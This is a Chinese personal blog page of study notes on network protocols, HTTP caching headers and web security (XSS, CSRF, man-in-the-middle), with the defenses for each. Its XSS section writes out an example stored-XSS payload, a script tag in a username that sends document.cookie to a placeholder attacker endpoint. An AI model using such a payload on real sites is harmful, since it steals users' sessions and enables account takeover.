<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  
  <title>http | Learning never ends</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="网络OSI 7 层参考模型TCP&#x2F;IP 协议 应用层(HTTP&#x2F;HTTPS&#x2F;DNS) 传输层(TCP&#x2F;UDP) internet 层(IP) 网络接口层(物理接口)  TCPTransmisson Control Prorocol  连接建立 可靠性传输特点： 三次握手四次挥手  UDPUser DataGram Protocol  非连接，不可靠传输方式">
<meta property="og:type" content="article">
<meta property="og:title" content="http">
<meta property="og:url" content="https://wxyhahaha.github.io/2022/07/01/http/readme/index.html">
<meta property="og:site_name" content="Learning never ends">
<meta property="og:description" content="网络OSI 7 层参考模型TCP&#x2F;IP 协议 应用层(HTTP&#x2F;HTTPS&#x2F;DNS) 传输层(TCP&#x2F;UDP) internet 层(IP) 网络接口层(物理接口)  TCPTransmisson Control Prorocol  连接建立 可靠性传输特点： 三次握手四次挥手  UDPUser DataGram Protocol  非连接，不可靠传输方式">
<meta property="og:locale">
<meta property="article:published_time" content="2022-07-01T03:06:14.772Z">
<meta property="article:modified_time" content="2022-07-01T03:08:55.551Z">
<meta property="article:author" content="wuxunyu">
<meta name="twitter:card" content="summary">
  
    <link rel="alternate" href="/atom.xml" title="Learning never ends" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/favicon.png">
  
  
    
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/typeface-source-code-pro@0.0.71/index.min.css">

  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
<meta name="generator" content="Hexo 6.2.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Learning never ends</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="Suche"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Suche"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="https://wxyhahaha.github.io"></form>
      </div>
    </div>
  </div>
</header>

      <div class="outer">
        <section id="main"><article id="post-http/readme" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-meta">
    <a href="/2022/07/01/http/readme/" class="article-date">
  <time class="dt-published" datetime="2022-07-01T03:06:14.772Z" itemprop="datePublished">2022-07-01</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="p-name article-title" itemprop="headline name">
      http
    </h1>
  

      </header>
    
    <div class="e-content article-entry" itemprop="articleBody">
      
        <h1 id="网络"><a href="#网络" class="headerlink" title="网络"></a>网络</h1><h2 id="OSI-7-层参考模型"><a href="#OSI-7-层参考模型" class="headerlink" title="OSI 7 层参考模型"></a>OSI 7 层参考模型</h2><h2 id="TCP-x2F-IP-协议"><a href="#TCP-x2F-IP-协议" class="headerlink" title="TCP&#x2F;IP 协议"></a>TCP&#x2F;IP 协议</h2><ol>
<li>应用层(<code>HTTP</code>&#x2F;<code>HTTPS</code>&#x2F;<code>DNS</code>)</li>
<li>传输层(<code>TCP</code>&#x2F;<code>UDP</code>)</li>
<li>internet 层(<code>IP</code>)</li>
<li>网络接口层(<code>物理接口</code>)</li>
</ol>
<h3 id="TCP"><a href="#TCP" class="headerlink" title="TCP"></a>TCP</h3><p><strong>Transmisson Control Prorocol</strong></p>
<ol>
<li>连接建立</li>
<li>可靠性传输<br>特点： 三次握手四次挥手</li>
</ol>
<h3 id="UDP"><a href="#UDP" class="headerlink" title="UDP"></a>UDP</h3><p><strong>User DataGram Protocol</strong></p>
<ol>
<li>非连接，不可靠传输方式</li>
<li>效率高，速度快，适合音频和视频</li>
</ol>
<h3 id="DNS"><a href="#DNS" class="headerlink" title="DNS"></a>DNS</h3><p><strong>Domain Name System</strong><br>域名解析系统<br>怎么查找域名：<br>DNS 域名解析采用的是递归查询的方式，过程，DNS 缓存&gt;根域名服务器&gt;根域名下一级</p>
<h2 id="HTTP-协议"><a href="#HTTP-协议" class="headerlink" title="HTTP 协议"></a>HTTP 协议</h2><p>Hypertext Transfer Protocol<br>超文本传输协议</p>
<h2 id="缓存"><a href="#缓存" class="headerlink" title="缓存"></a>缓存</h2><p>数据库缓存、服务器端缓存（<code>nginx</code>、<code>CDN 缓存</code>）、浏览器缓存<br>浏览器缓存由包含很多内容：<code>HTTP 缓存</code>、<code>indexDB</code>、<code>cookie</code>、<code>localstorage </code>等等</p>
<h3 id="HTTP-缓存"><a href="#HTTP-缓存" class="headerlink" title="HTTP 缓存"></a>HTTP 缓存</h3><p>强缓存和协商缓存的区别就是，强缓存是不需要发请求到服务器的，而协商缓存是需要浏览器发送请求到服务器判断本地的缓存是否失效，若不失效则不请求服务器，反之请求服务器获取最新资源</p>
<h3 id="强缓存"><a href="#强缓存" class="headerlink" title="强缓存"></a>强缓存</h3><p>命中强缓存时，状态码为 200（Size 列标识为 from cache）的响应请求，利用 <code>Expire</code>s 和<code> Cache-Control</code> 控制强缓存。</p>
<ol>
<li>Expires<br>该值是响应头的字段，指定缓存到期的时间， <code>Expires=时间</code>，该时间为绝对时间，<code>Last-Modify</code> 结合使用</li>
<li>Cache-Control<br>该值是响应头的字段，指定缓存到期的时间，<code>Cache-Control=max-age+时间</code>，该事件为相对时间</li>
</ol>
<p><code>Cache-Control</code> 优先级比 <code>Expires</code> 高<br>优点：<br>服务器配置有限，降低服务器压力，1 台服务器能做到 10 台服务器的能力</p>
<blockquote>
<p>&lt;- Expires: xxxx<br>&lt;- Cache-Control:max-age&#x3D;600</p>
</blockquote>
<h3 id="协商缓存"><a href="#协商缓存" class="headerlink" title="协商缓存"></a>协商缓存</h3><p>命中协商缓存时，状态码为 304，利用 <code>Last-Modify/If-Modify-Since</code></p>
<ol>
<li>Last-Modify&#x2F;If-Modify-Since<br>第一次请求服务器，返回时会带上 <code>Last-Modify</code> 的响应头，标识着该资源最后修改时间，第二次请求时会带上 <code>If-Modify-since</code> 请求头，值为第一次响应的 <code>Last-Modify</code> 值，服务器会根据 <code>If-Modify-since</code> 判断是否命中缓存，<strong>如果命中则不请求服务器，返回 304</strong>，不返回 <code>Last-Modify</code><br>第一次响应： <code>Last-Modify</code><br>第二次请求： <code>If-Modify-since</code></li>
<li>Etag&#x2F;If-None-Match<br><code>Etag/If-None-Match</code> <code>返回的是一个校验码，Etag</code> 保证每个资源时唯一的，资源的变化都为导致 Etag 改变，服务器根据浏览器发送的 <code>If-None-Match</code> 判断是否命中缓存<br>两者会优先验证 <code>Etag</code>,两种区别：</li>
</ol>
<ul>
<li>精度问题，第一种的精度时精确到秒，当资源的改变在秒级的时候，不太准确。所以由了 <code>Etag</code></li>
<li>文件定期生成，当内容一样时，无法使用 <code>Last-Modify</code> 这一套</li>
<li>有可能存在服务器没有准确获取文件修改时间等，<code>Last-Modify</code> 也不能使用</li>
</ul>
<blockquote>
<p>&lt;- last-modifed: xxx<br>-&gt; if-modified-since: xxx<br>&lt;- etag: bbb<br>-&gt; if-noe-match: bbb</p>
</blockquote>
<h1 id="web-安全"><a href="#web-安全" class="headerlink" title="web 安全"></a>web 安全</h1><h2 id="浏览器如何获取到-Cookie"><a href="#浏览器如何获取到-Cookie" class="headerlink" title="浏览器如何获取到 Cookie"></a>浏览器如何获取到 Cookie</h2><ul>
<li>利用接口响应的 Set-Cookie 字段<br>有哪些属性</li>
</ul>
<ol>
<li>domain</li>
<li>max-age、Express</li>
<li>httponly</li>
<li>name&#x3D;value</li>
</ol>
<h2 id="XSS-Cross-Site-Script-跨站脚本攻击"><a href="#XSS-Cross-Site-Script-跨站脚本攻击" class="headerlink" title="XSS (Cross-Site-Script) 跨站脚本攻击"></a>XSS (Cross-Site-Script) 跨站脚本攻击</h2><p>恶意攻击者，将一些恶意代码插入到网页，当用户访问的时候自动执行这段代码，从而达到攻击者目的</p>
<ol>
<li>反射型<br>特点： 一次性<br>用户点开带有恶意的 url（含有 script），浏览器将此段发送给服务端，服务端返回客户端，此时浏览器识别到可执行代码将其执行</li>
<li>存储型<br>特点：恶意代码存储到服务器<br>攻击者提交含有 script 标签的恶意代码表单到服务器，服务端将其保存，展示给其他用户时执行恶意代码</li>
</ol>
<h3 id="实现过程"><a href="#实现过程" class="headerlink" title="实现过程"></a>实现过程</h3><ol>
<li>将 <code>&lt;script scr=&quot;https://攻击者接口?cookie=document.cookie&quot;&gt; &lt;/script&gt;</code>， 注册成用户名， 提交给服务端，服务端保存</li>
<li>用户登录，如果查看到这个攻击者的账号信息相关，那么会执行恶意代码，将 cookie 拿到，发送到攻击者接口</li>
<li>攻击者事先会收集各种接口，找到相关可以获取到用户的接口</li>
<li>通过 cookie 获取到用户信息（手机号等）等</li>
</ol>
<h3 id="用途"><a href="#用途" class="headerlink" title="用途"></a>用途</h3><ol>
<li>冒充身份</li>
<li>刷点击（注入文章地址）</li>
<li>弹广告（注入一段创建弹窗的代码）</li>
<li>蠕虫病毒（冒充身份去发送邮件，联系人点开又会冒充去发送邮件….）</li>
</ol>
<h3 id="怎么防御"><a href="#怎么防御" class="headerlink" title="怎么防御"></a>怎么防御</h3><ol>
<li>输入过滤，对于特殊符号等不允许提交</li>
<li>httponly</li>
<li>转义 HTML 比如： <code>&lt; =&gt; &amp;lt</code> 、 <code>&gt; =&gt; &amp;gt</code></li>
</ol>
<h2 id="CSRF-Cross-Site-Request-Forgery-跨站点请求伪造"><a href="#CSRF-Cross-Site-Request-Forgery-跨站点请求伪造" class="headerlink" title="CSRF (Cross-Site-Request-Forgery) 跨站点请求伪造"></a>CSRF (Cross-Site-Request-Forgery) 跨站点请求伪造</h2><p>诱导受害者去到攻击者的网站，攻击者网站发起了相关请求，并且带上了受害者 cookie，从而可以做一些恶意的操作</p>
<p>前提： 浏览器没有严格执行同源政策，请求所在网站必须和请求的接口同源，就有可能发生 CSRF</p>
<h3 id="实现过程-1"><a href="#实现过程-1" class="headerlink" title="实现过程"></a>实现过程</h3><ol>
<li>受害者登录信任网站</li>
<li>未关闭含有 cookie 的信任网站</li>
<li>诱导受害者去攻击者网站（如果配合 XSS 此时可能会直接跳转，或者弹窗诱导到攻击者网站）</li>
<li>在攻击者网站（用隐藏表单自动发送请求，img&#x2F;src 自动 get 请求等骚操作…）发起信任网站相关接口，此时会携带用户的 cookie，冒充用户</li>
</ol>
<h3 id="用途-1"><a href="#用途-1" class="headerlink" title="用途"></a>用途</h3><ol>
<li>冒充身份</li>
<li>蠕虫病毒（冒充身份去发送邮件，联系人点开又会冒充去发送邮件….）</li>
</ol>
<h3 id="怎么防御-1"><a href="#怎么防御-1" class="headerlink" title="怎么防御"></a>怎么防御</h3><ol>
<li>用验证码，信任网站开启验证码，而攻击者网站没办法获取正确验证码</li>
<li>Referer ，表明请求的站点地址，但是有可能存在伪造 <code>Referer</code> 头</li>
<li>token，客户端接收服务端的 token，保存在隐藏区域（本地存储，隐藏的 html 元素，代码内存等），请求带上 token</li>
<li>使用带有同源政策的浏览器，升级到默认开启严格模式版本</li>
</ol>
<h2 id="中间人攻击"><a href="#中间人攻击" class="headerlink" title="中间人攻击"></a>中间人攻击</h2><p>是在数据传输时发生的攻击手段。截取 http 在传输时数据包，获取用户信息，篡改信息，篡改密钥</p>

      
    </div>
    <footer class="article-footer">
      <a data-url="https://wxyhahaha.github.io/2022/07/01/http/readme/" data-id="cl51vix6i00041svzazfn5v7o" data-title="http" class="article-share-link">Teilen</a>
      
      
      
    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2022/07/01/js/readme/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Neuer</strong>
      <div class="article-nav-title">
        
          js
        
      </div>
    </a>
  
  
    <a href="/2022/07/01/ast/readme/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Älter</strong>
      <div class="article-nav-title">ast</div>
    </a>
  
</nav>

  
</article>


</section>
        
          <aside id="sidebar">
  
    

  
    

  
    
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archiv</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/07/">July 2022</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/06/">June 2022</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">letzter Beitrag</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2022/07/01/%E9%9D%A2%E8%AF%95/%E6%B7%B1%E4%BF%A1%E6%9C%8D/">深信服</a>
          </li>
        
          <li>
            <a href="/2022/07/01/vue/readme/">vue</a>
          </li>
        
          <li>
            <a href="/2022/07/01/typescript/readme/">typescript</a>
          </li>
        
          <li>
            <a href="/2022/07/01/style/readme/">style</a>
          </li>
        
          <li>
            <a href="/2022/07/01/js/readme/">js</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      
      &copy; 2022 wuxunyu<br>
      Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>

    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    


<script src="/js/jquery-3.4.1.min.js"></script>



  
<script src="/fancybox/jquery.fancybox.min.js"></script>




<script src="/js/script.js"></script>





  </div>
</body>
</html>